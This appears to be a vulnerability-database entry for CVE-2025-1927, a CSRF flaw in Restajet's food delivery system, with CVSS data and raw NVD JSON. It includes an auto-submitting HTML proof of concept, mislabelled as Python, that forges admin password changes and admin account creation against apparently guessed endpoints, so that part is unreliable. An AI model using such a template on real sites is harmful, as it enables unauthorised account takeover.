Security Vulnerability Report
中文
CVE-2025-1927 CVSS 7.1 HIGH

CVE-2025-1927

Published: 2025-12-19 12:15:46
Last Modified: 2026-03-26 08:16:19

Description

Cross-Site Request Forgery (CSRF) vulnerability in Restajet Information Technologies Inc. Online Food Delivery System allows Cross Site Request Forgery.This issue affects Online Food Delivery System: through 19122025. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:restajet:online_food_delivery_system:-:*:*:*:*:*:*:* - VULNERABLE
Restajet Online Food Delivery System <= 19122025

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CSRF PoC for CVE-2025-1927 --> <!-- Target: Restajet Online Food Delivery System --> <!DOCTYPE html> <html> <head> <title>CSRF Attack PoC</title> </head> <body> <h1>CSRF PoC for CVE-2025-1927</h1> <p>This PoC demonstrates the CSRF vulnerability in Restajet Online Food Delivery System.</p> <!-- Example: Change admin password --> <form action="https://target-site.com/admin/profile/update" method="POST" id="csrfForm"> <input type="hidden" name="username" value="admin" /> <input type="hidden" name="password" value="hacked123" /> <input type="hidden" name="email" value="[email protected]" /> </form> <!-- Example: Add new admin user --> <form action="https://target-site.com/admin/users/add" method="POST" id="csrfForm2"> <input type="hidden" name="new_username" value="hacker" /> <input type="hidden" name="new_password" value="hacker123" /> <input type="hidden" name="role" value="admin" /> </form> <script> // Auto-submit forms when page loads document.getElementById('csrfForm').submit(); // Or trigger second form after first submission // setTimeout(() => document.getElementById('csrfForm2').submit(), 1000); </script> <p>If you see this message, the forms were submitted successfully.</p> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-1927", "sourceIdentifier": "[email protected]", "published": "2025-12-19T12:15:45.513", "lastModified": "2026-03-26T08:16:19.470", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross-Site Request Forgery (CSRF) vulnerability in Restajet Information Technologies Inc. Online Food Delivery System allows Cross Site Request Forgery.This issue affects Online Food Delivery System: through 19122025. NOTE: The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:restajet:online_food_delivery_system:-:*:*:*:*:*:*:*", "matchCriteriaId": "D9645287-A3CA-4036-B2DB-513F54F58AE6"}]}]}], "references": [{"url": "https://www.usom.gov.tr/bildirim/tr-25-0469", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}